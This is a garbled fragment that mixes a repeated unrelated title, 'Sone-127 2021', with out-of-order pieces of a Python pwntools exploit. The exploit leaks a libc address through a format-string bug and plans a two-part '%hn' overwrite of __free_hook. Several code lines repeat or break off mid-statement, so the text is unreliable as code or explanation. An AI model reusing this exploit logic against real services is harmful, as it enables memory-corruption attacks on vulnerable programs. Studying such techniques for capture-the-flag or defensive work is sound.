Sone-127 2021 Online

# 1️⃣ Leak libc libc_base = leak_libc(io)

def main(): io = remote(HOST, PORT)

%addr_lowc%8$hn%addr_highc%9$hn Because the target address ( __free_hook ) is 8‑byte aligned, we split it into two 2‑byte halves and write with %hn (write 2 bytes). SONE-127 2021

if __name__ == '__main__': main()

The final crafted string (Python example): # 1️⃣ Leak libc libc_base = leak_libc(io) def

target = free_hook low = target & 0xffff high = (target >> 16) & 0xffff 16) & 0xffff def leak_libc(io): io.sendlineafter(b'&gt

def leak_libc(io): io.sendlineafter(b'> ', b'echo %7$p') io.recvuntil(b'echo ') leak = int(io.recvline().strip(), 16) log.success(f'Leaked address: hex(leak)') # __libc_start_main+231 is the usual location we see; adjust if needed libc_start_main_ret = leak - 231 libc_base = libc_start_main_ret - libc.sym['__libc_start_main'] log.info(f'Libc base: hex(libc_base)') return libc_base